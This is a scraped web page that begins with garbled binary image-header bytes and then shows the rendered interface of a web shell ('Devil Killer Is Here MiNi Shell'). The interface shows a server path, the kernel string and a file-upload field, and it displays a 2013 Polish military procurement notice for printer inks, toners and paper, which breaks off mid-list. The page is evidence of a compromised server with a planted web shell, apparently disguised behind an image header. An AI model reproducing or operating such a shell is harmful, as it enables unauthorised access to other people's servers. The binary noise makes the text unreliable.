JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131105/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131105/232069-N-2013.html

<p class="kh_header"><b>Warszawa: Dostawa materiałów eksploatacyjnych do sprzętu łączności i informatyki</b><br>
<b>Numer ogłoszenia: 232069 - 2013; data zamieszczenia: 05.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa nr 4198 , ul. Żwirki i Wigury 1C, 00-909 Warszawa, woj. mazowieckie, tel. 022 6821316, faks 022 6821316.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Wojskowa 4198.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów eksploatacyjnych do sprzętu łączności i informatyki.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest Dostawa materiałów eksploatacyjnych do sprzętu łączności i informatyki, nowych materiałów eksploatacyjnych oraz papieru do drukarek, faksów i ploterów dla jednostek wojskowych będących na zaopatrzeniu Jednostki Wojskowej 4198     w Warszawie.
Asortyment i ilość dostawy
Zadanie nr 1 - TUSZE
1.Tusz czarny - do - 20 szt. 
- drukarki HP DJ 710C
- drukarki HP DJ 720C
2.Tusz czarny - do 12 szt.
- drukarki HP DJ 450CBI
- drukarki HP DJ 5652
- urządzenia wielofunkcyjnego HP DJ 9650
3.Tusz kolorowy - do - 12 szt.
- drukarki HP DJ 450CBI
- drukarki HP DJ 5652
4.Tusz kolorowy - do  - 12 szt.
- drukarki HP DJ 710C
- drukarki HP DJ 720C
- drukarki HP DJ 1125C
Zadanie nr 2 - TUSZE 
1.Tusz czarny - do - 10 szt.
- plotera EPSON STYLUS PRO 9700 - nowo zakupione urządzenia na gwarancji
2.Tusz niebieski - do - 8 szt.
- plotera EPSON STYLUS PRO 9700 - nowo zakupione urządzenia na gwarancji
3. Tusz purpurowy - do - 8 szt.
- plotera EPSON STYLUS PRO 9700 - nowo zakupione urządzenia na gwarancji
4. Tusz żółty - do - 8 szt.
- plotera EPSON STYLUS PRO 9700 - nowo zakupione urządzenia na gwarancji
Zadanie nr 3 - TONERY 
1.Kaseta z czarnym tonerem - do - 10 szt.
- drukarki HP LJ 5L
- drukarki HP LJ 6L
2.Kaseta z czarnym tonerem - do - 20 szt.
	- drukarki HP LJ 1100
3.	Kaseta z czarnym tonerem - do - 20 szt.
- drukarki HP LJ 1200			
4.Kaseta z czarnym tonerem - do - 10 szt.
- urządzenia wielofunkcyjnego HP LJ M2727NF		
5.Kaseta z czarnym tonerem - do - 70 szt.
- drukarki HP CP 1215 - nowo zakupione urządzenia na gwarancji		
6.Kaseta z błękitnym tonerem - do - 50 szt.
- drukarki HP CP 1215 - nowo zakupione urządzenia na gwarancji		
7.Kaseta z purpurowym tonerem - do - 50 szt.
- drukarki HP CP 1215 - nowo zakupione urządzenia na gwarancji		
8.Kaseta z żółtym tonerem - do - 50 szt.
- drukarki HP CP 1215 - nowo zakupione urządzenia na gwarancji		
9.	Kaseta z czarnym tonerem - do - 16 szt.
- drukarki HP LJ 1320
- drukarki HP LJ 1320N 		
Zadanie nr 4 - TONERY 
1.Kaseta z czarnym tonerem - do - 10 szt.
- urządzenia wielofunkcyjne/telefax PHILIPS LPF 855 SAGEM 
Zadanie nr 5 - TONERY 
1.Kaseta z czarnym tonerem - do - 10 szt.
- drukarki FS-1118MFP
- opakowanie każdego tonera w folii + pudełko kartonowe;
2.Kaseta z czarnym tonerem - do - 10 szt.
- drukarki FS-1030DN
- drukarki FS-1030D
3.Kaseta z czarnym tonerem - do - 10 szt.
- drukarki FS-2000D - nowo zakupione urządzenia na gwarancji
4.Kaseta z czarnym tonerem - do - 10 szt.
- urządzenia wielofunkcyjne FS-1028MFP - nowo zakupione urządzenia na gwarancji
5.Toner czarny - do - 8 szt.
- drukarki FS-C5350DN - nowo zakupione urządzenia na gwarancji
6.Toner żółty - do - 6 szt.
- drukarki FS-C5350DN - nowo zakupione urządzenia na gwarancji
7.Toner błękitny - do - 6 szt.
- drukarki FS-C5350DN - nowo zakupione urządzenia na gwarancji
8.Toner purpurowy - do - 6 szt.
- drukarki FS-C5350DN - nowo zakupione urządzenia na gwarancji
9.Toner czarny - do - 10 szt.
- drukarki FS-C5030DN - nowo zakupione urządzenia na gwarancji
10.Toner błękitny - do - 8 szt.
- drukarki FS-C5030DN - nowo zakupione urządzenia na gwarancji
11.Toner purpurowy - do - 8 szt.
- drukarki FS-C5030DN - nowo zakupione urządzenia na gwarancji
12.Toner żółty - do - 8 szt.
- drukarki FS-C5030DN - nowo zakupione urządzenia na gwarancji
13.Toner czarny - do - 15 szt.
- drukarki FS-9530DN - nowo zakupione urządzenia na gwarancji
Zadanie nr 6 - TONERY 
1.Toner czarny - do - 15 szt.
- urządzenia wielofunkcyjnego Bizhub C253 - nowo zakupione urządzenia na gwarancji
2.Toner błękitny - do - 10 szt.
- urządzenia wielofunkcyjnego Bizhub C253 - nowo zakupione urządzenia na gwarancji
3.Toner purpurowy - do - 10 szt.
- urządzenia wielofunkcyjnego Bizhub C253 - nowo zakupione urządzenia na gwarancji
4.Toner żółty - do - 10 szt.
- urządzenia wielofunkcyjnego Bizhub C253 - nowo zakupione urządzenia na gwarancji
5.Toner niebieski - do - 8 szt.
- urządzenia wielofunkcyjnego Bizhub C280 - nowo zakupione urządzenia na gwarancji
- urządzenia wielofunkcyjnego OCE Variolink 2222C - nowo zakupione urządzenia na gwarancji
6.Toner purpurowy - do - 8 szt.
- urządzenia wielofunkcyjnego Bizhub C280 - nowo zakupione urządzenia na gwarancji
- urządzenia wielofunkcyjnego OCE Variolink 2222C - nowo zakupione urządzenia na gwarancji
7.Toner żółty - do - 8 szt.
- urządzenia wielofunkcyjnego Bizhub C280 - nowo zakupione urządzenia na gwarancji
- urządzenia wielofunkcyjnego OCE Variolink 2222C - nowo zakupione urządzenia na gwarancji
8.Toner czarny - do - 10 szt.
- urządzenia wielofunkcyjnego Bizhub C280 - nowo zakupione urządzenia na gwarancji
- urządzenia wielofunkcyjnego OCE Variolink 2222C - nowo zakupione urządzenia na gwarancji
Zadanie nr 7 - TONERY 
1.Toner czarny - do  - 20 szt.
- drukarki E460DN - nowo zakupione urządzenia na gwarancji
Zadanie nr 8 - TONERY I BĘBNY
1.Toner czarny  - do - 20 szt.
- telefax BROTHER 2920 - nowo zakupione urządzenia na gwarancji
2.Bęben do BROTHER 2920 - 12 szt.
- tylko oryginalny bęben Brother - nowo zakupione urządzenia na gwarancji
- opakowanie każdego bębna w folii + pudełko kartonowe;
Zadanie nr 9 - TONERY 
1.Kaseta z czarnym tonerem - do - 20 szt.
- drukarki Lexmark C736DN - nowo zakupione urządzenia na gwarancji	
2.Kaseta z żółtym tonerem - do - 15 szt.
- drukarki Lexmark C736DN - nowo zakupione urządzenia na gwarancji 	
3.Kaseta z błękitnym tonerem - do - 15 szt.
- drukarki Lexmark C736DN  - nowo zakupione urządzenia na gwarancji	
4.Kaseta z purpurowym tonerem - do - 15 szt.
- drukarki Lexmark C736DN - nowo zakupione urządzenia na gwarancji	
Zadanie nr 10 - PAPIER DO PLOTERA
1.Papier do plotera - 4 szt.
- Epson Stylus Pro 9700 - nowo zakupione urządzenia na gwarancji 		
2.Papier premium matt do ploterów i drukarek - 14 szt. 
- Epson, Canon, HP, Lexmark - nowo zakupione urządzenia na gwarancji
3.Papier real gloss G265 do ploterów i drukarek - 12 szt. 
- Epson Stylus Pro 9700 - nowo zakupione urządzenia na gwarancji 	
4.Papier premium matt do ploterów i drukarek - 6 szt. 
- Epson, Canon, HP, Lexmark - nowo zakupione urządzenia na gwarancji
5.Papier real gloss G265 do ploterów i drukarek - 6 szt.
- Epson Stylus Pro 9700 - nowo zakupione urządzenia na gwarancji 	 
ZADANIE nr 11 - PAPIER 
1.Papier komputerowy 250x12x4 -  20 ryz.
2.Papier komputerowy 240x12x4 - 30 ryz.
3.Papier A4- 1000 ryz.
4.Papier A3-  150 ryz.
Zadanie nr 12 - INNE 
1.Sprężone powietrze: - 100 szt. 
2.Pianka do czyszczenia plastiku  - 80 szt. 
3.Płyn do czyszczenia monitorów LCD - 42 szt.
III. W przypadku gdy Zamawiający nie określił w specyfikacji producenta towaru lub materiału oraz dla wszystkich produktów równoważnych Wykonawca
w przedstawionej ofercie winien podać nazwa producenta, pełną nazwę i symbol produktu lub materiału. W przypadku przyjęcia oferty wzory produktów zostaną
u Zamawiającego i zostaną rozliczone w trakcie realizacji umowy.
Za produkty równoważne dla asortymentu Zamawiający uznaje te produkty i towary, które posiadają własności i parametry techniczno-jakościowe takie jak produkty wskazane przez Zamawiającego. Produkt równoważny na opakowaniu ma posiadać trwale nadrukowany -nie naklejony- typ i rodzaj produktu, nazwę producenta 
i miejsce produkcji.
IV. Nie dopuszcza się zaproponowania przez Wykonawcę artykułu, produktu równoważnego, pochodzącego lub wyprodukowanego z użyciem materiałów regenerowanych, pozyskanych w drodze regeneracji.
V. Wymaga się, aby dostarczone tusze, tonery, kasety z taśmami oraz bębny muszą być oryginalne, fabrycznie nowe w opakowaniach producenta i wolne od jakichkolwiek wad, posiadały na opakowaniu zewnętrznym informacje pozwalające na identyfikację producenta.
Pod pojęciem fabrycznie nowe Zamawiający rozumie produkty wykonane wyłącznie 
z nowych elementów, w oryginalnych opakowaniach producenta bez śladów uszkodzenia z widocznym logo, symbolem produktu oraz terminem gwarancji do 
12 miesięcy.
VI. Termin ważności -gwarancji- na dostarczone w-w materiały eksploatacyjne do minimum 12 miesięcy., licząc od daty podpisania protokołu przyjęcia - przekazania.
VII. Termin dostawy maksymalnie do 7 dni, licząc od daty podpisania umowy.
VIII. Zamawiający nie dopuszcza zaoferowania tonerów, tuszy połówkowych 
-tzw. starterów
Szczegółowe określenie przedmiotu zamówienia znajduje się na stronie internetowej Zamawiającego.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.19.21.13-6, 30.12.51.10-5, 30.12.51.20-8, 30.19.76.43-5, 30.19.76.30-1, 30.19.76.44-2, 30.19.93.10-6, 24.11.32.00-1, 30.23.72.50-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 12.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 7.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana według formuły spełnia- nie spełnienia w oparciu o złożone w ofercie dokumenty i oświadczenia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana według formuły spełnia- nie spełnienia w oparciu o złożone w ofercie dokumenty i oświadczenia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana według formuły spełnia- nie spełnienia w oparciu o złożone w ofercie dokumenty i oświadczenia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana według formuły spełnia- nie spełnienia w oparciu o złożone w ofercie dokumenty i oświadczenia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana według formuły spełnia- nie spełnienia w oparciu o złożone w ofercie dokumenty i oświadczenia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo do podpisania oferty, jeśli to nie wynika z innych dokumentów dołączonych do oferty</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Podstawą dokonania zmiany zapisów umowy będą:
-zmiana miejsca dostawy,
-zmiana terminu dostawy wynikająca z działania siły wyższej,
-zmiana przepisów prawnych np. VAT,
-zmiana określonego producenta, modelu i/lub typu przedmiotu umowy,
w przypadku zakończenia jego produkcji lub wycofania go z produkcji, z tym, że cena wskazana w § 1 umowy nie ulegnie zmianie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.1blot. sp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jednostka Wojskowa 4198,   00-909 Warszawa ul. Żwirki i Wigury 1C, 
budynek 50, pok. 4.</p><p><b>IV.4.2) Opis potrzeb i wymagań zamawiającego określonych w sposób umożliwiający przygotowanie się wykonawców do udziału w dialogu konkurencyjnym lub informacja o sposobie uzyskania tego opisu:</b> nie dotyczy.</p><p><b>IV.4.3) Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:</b> nie dotyczy.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.11.2013 godzina 10:00, miejsce: Jednostka Wojskowa 4198,   00-909 Warszawa ul. Żwirki i Wigury 1C, 
budynek 51,  Kancelaria..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1 - TUSZE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 1 - TUSZE
1.	Tusz czarny - do - 20 szt. 
- drukarki HP DJ 710C
- drukarki HP DJ 720C
2.	Tusz czarny - do 12 szt.
- drukarki HP DJ 450CBI
- drukarki HP DJ 5652
- urządzenia wielofunkcyjnego HP DJ 9650
3.	Tusz kolorowy - do - 12 szt.
- drukarki HP DJ 450CBI
- drukarki HP DJ 5652
4.	Tusz kolorowy - do  - 12 szt.
- drukarki HP DJ 710C
- drukarki HP DJ 720C
- drukarki HP DJ 1125C.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.21.13-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2 - TUSZE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 2 - TUSZE 
1.	Tusz czarny - do - 10 szt.
- plotera EPSON STYLUS PRO 9700 - nowo zakupione urządzenia na gwarancji
2.	Tusz niebieski - do - 8 szt.
- plotera EPSON STYLUS PRO 9700 - nowo zakupione urządzenia na gwarancji
3. 	Tusz purpurowy - do - 8 szt.
- plotera EPSON STYLUS PRO 9700 - nowo zakupione urządzenia na gwarancji
4. 	Tusz żółty - do - 8 szt.
- plotera EPSON STYLUS PRO 9700 - nowo zakupione urządzenia na gwarancji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.21.13-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie nr 3 - TONERY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 3 - TONERY 
1.	Kaseta z czarnym tonerem - do - 10 szt.
- drukarki HP LJ 5L
- drukarki HP LJ 6L
2.	Kaseta z czarnym tonerem - do - 20 szt.
	- drukarki HP LJ 1100
3.	Kaseta z czarnym tonerem - do - 20 szt.
- drukarki HP LJ 1200			
4.	Kaseta z czarnym tonerem - do - 10 szt.
- urządzenia wielofunkcyjnego HP LJ M2727NF		
5.	Kaseta z czarnym tonerem - do - 70 szt.
- drukarki HP CP 1215 - nowo zakupione urządzenia na gwarancji		
6.	Kaseta z błękitnym tonerem - do - 50 szt.
- drukarki HP CP 1215 - nowo zakupione urządzenia na gwarancji		
7.	Kaseta z purpurowym tonerem - do - 50 szt.
- drukarki HP CP 1215 - nowo zakupione urządzenia na gwarancji		
8.	Kaseta z żółtym tonerem - do - 50 szt.
- drukarki HP CP 1215 - nowo zakupione urządzenia na gwarancji		
9.	Kaseta z czarnym tonerem - do - 16 szt.
- drukarki HP LJ 1320
- drukarki HP LJ 1320N.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.10-5, 30.12.51.20-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie nr 4 - TONERY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 4 - TONERY 
1.	Kaseta z czarnym tonerem - do - 10 szt.
- urządzenia wielofunkcyjne/telefax PHILIPS LPF 855 SAGEM.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.10-5, 30.12.51.20-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie nr 5 - TONERY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 5 - TONERY 
1.	Kaseta z czarnym tonerem - do - 10 szt.
- drukarki FS-1118MFP
- opakowanie każdego tonera w folii + pudełko kartonowe;
2.	Kaseta z czarnym tonerem - do - 10 szt.
- drukarki FS-1030DN
- drukarki FS-1030D
3.	Kaseta z czarnym tonerem - do - 10 szt.
- drukarki FS-2000D - nowo zakupione urządzenia na gwarancji
4.	Kaseta z czarnym tonerem - do - 10 szt.
- urządzenia wielofunkcyjne FS-1028MFP - nowo zakupione urządzenia na gwarancji
5.	Toner czarny - do - 8 szt.
- drukarki FS-C5350DN - nowo zakupione urządzenia na gwarancji
6.	Toner żółty - do - 6 szt.
- drukarki FS-C5350DN - nowo zakupione urządzenia na gwarancji
